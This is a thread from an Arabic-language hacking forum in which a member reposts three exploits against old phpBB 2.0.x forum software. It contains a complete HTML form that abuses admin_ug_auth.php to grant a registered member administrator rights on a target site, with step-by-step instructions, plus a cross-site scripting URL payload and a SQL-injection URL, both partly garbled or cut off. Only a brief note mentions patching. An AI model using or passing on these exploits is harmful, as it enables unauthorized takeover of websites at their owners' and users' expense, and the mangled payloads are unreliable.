‏¨ ¨°•√♥ قانون الهكر لا يحمي المغفلين ♥√•°‏¨
أهلاًوسهلاً
في
¨°•√♥️منتدى متعب الشويمان ♥️√•°‏¨
أتمنى لكم المتعه والفائده
‏¨ ¨°•√♥ قانون الهكر لا يحمي المغفلين ♥√•°‏¨
أهلاًوسهلاً
في
¨°•√♥️منتدى متعب الشويمان ♥️√•°‏¨
أتمنى لكم المتعه والفائده
‏¨ ¨°•√♥ قانون الهكر لا يحمي المغفلين ♥√•°‏¨
هل تريد التفاعل مع هذه المساهمة؟ كل ما عليك هو إنشاء حساب جديد ببضع خطوات أو تسجيل الدخول للمتابعة.

‏¨ ¨°•√♥ قانون الهكر لا يحمي المغفلين ♥√•°‏¨


 
الرئيسيةأحدث الصورالتسجيلدخول

 

 ثغرة في منتديات phpbb

اذهب الى الأسفل 
2 مشترك
كاتب الموضوعرسالة
chabazik




عدد المساهمات : 6
تاريخ التسجيل : 17/05/2011

ثغرة في منتديات phpbb  Empty
مُساهمةموضوع: ثغرة في منتديات phpbb    ثغرة في منتديات phpbb  Icon_minitimeالثلاثاء مايو 17, 2011 9:41 pm

ثغرة في منتديات phpbb



شلون الشباب ثغرة بمنتديات phpbb


ثغرة خطيرة جدأ في منتدى من نوع
PhpBB2

في ملف admin_ug_auth.php
الوصف:
يمكنك من خلال هذه الثغرة أن تأخذ تصريح بأن تكون مدير والمشرف العام على المنتدى
وبذلك يمكنك الدخول الى لوحة التحكم متى شئت
الأصدار:
2.0.0
لتجربة الثغرة اولا سجل بالمنتدى
ثم احفظ رقم عضويتك بالمنتدى
بعدها افتح المفكرة وانسخ مايلي اليها
شفرة
<html>
<head>
</head>
<body>

<form method="post"
action="http://www.domain_name/board_directory/admin/admin_ug_auth.php">
User Level: <select name="userlevel">
<option value="admin">Administrator</option>
<option value="user">User</option></select>
<input type="hidden" name="private[1]" value="0">
<input type="hidden" name="moderator[1]" value="0">
<input type="hidden" name="mode" value="user">
<input type="hidden" name="adv" value="">
User Number: <input type="text" name="u" size="5">
<input type="submit" name="submit" value="Submit">

</form>
</body>
</html>



عدل هذا العنوان الى عنوان الموقع المستهدف http://www.domain_name/board_directory
اخفظه بامتدادhtml
عندما تدخل الى الصفحة التي قمت بحفظها سوف تجد
قائمة والتي يتم اختيار التصريح الذي تريده لتطبيق الثغرة اختر تصريح Administrator
ثم بالمربع الجانبي شع رقم عضويتك بالمنتدى
أضغط زر submit
بعدها سوف تاتيك شاشة تسجيل الدخول ضع اسم المستخدم وكلمة المرور الخاصة بك

الحل موجود هنا :
1- اذا كنت مصمم ماتبي غيرهالمنتدى يجب ان تحدث نسختك الى اخر اصدار وهو 2.0.3
2- أنصحك بالأنتقال الى منتدى Invision Board
وزاجل ماقصر نزل تعاريب للمنتدى منتدى حلو وقوي
بس عيبه الهاكات صعب تركيب الهاكات :rolleyes

::::::::
الثغرة رقم2
الاصدر المصاب هو Powered by phpBB 2.0.6

كل ما عليك تطبق الكود
http://www.xxxxx.com/php/index.php?category_rows[0][cat_id]=1&category_rows[0][cat_title]=waraxe<script>document.write(document.&@#&@#&@#&@ #&@#&@#);</script>&category_rows[0][cat_order]=99

الثغرة رقم 3

الاصدر المصاب هو Powered by phpBB 2.0.9

كل ما عليك هو تطبق هذا الكود

http://www.xxxxx.com/privmsg.php?fol...%20LIMIT%201/*
منقول

الرجوع الى أعلى الصفحة اذهب الى الأسفل
xxMUTEBxx
Admin
xxMUTEBxx


عدد المساهمات : 178
تاريخ التسجيل : 30/04/2011
العمر : 38

ثغرة في منتديات phpbb  Empty
مُساهمةموضوع: رد: ثغرة في منتديات phpbb    ثغرة في منتديات phpbb  Icon_minitimeالأربعاء مايو 18, 2011 6:52 pm

مشكووووووووووووووووووووووووور
الرجوع الى أعلى الصفحة اذهب الى الأسفل
https://muteb.forumarabia.com
 
ثغرة في منتديات phpbb
الرجوع الى أعلى الصفحة 
صفحة 1 من اصل 1
 مواضيع مماثلة
-
» ثغرة سكول سهلة و بسيطة مع الاستغلال
» ثغرة sql قويّة جدّا جدّا جدا و المواقع المصابة بالالاف

صلاحيات هذا المنتدى:لاتستطيع الرد على المواضيع في هذا المنتدى
‏¨ ¨°•√♥ قانون الهكر لا يحمي المغفلين ♥√•°‏¨ :: برامج هكر :: قسم الشرح والدروس الخاصه بالهكر-
انتقل الى: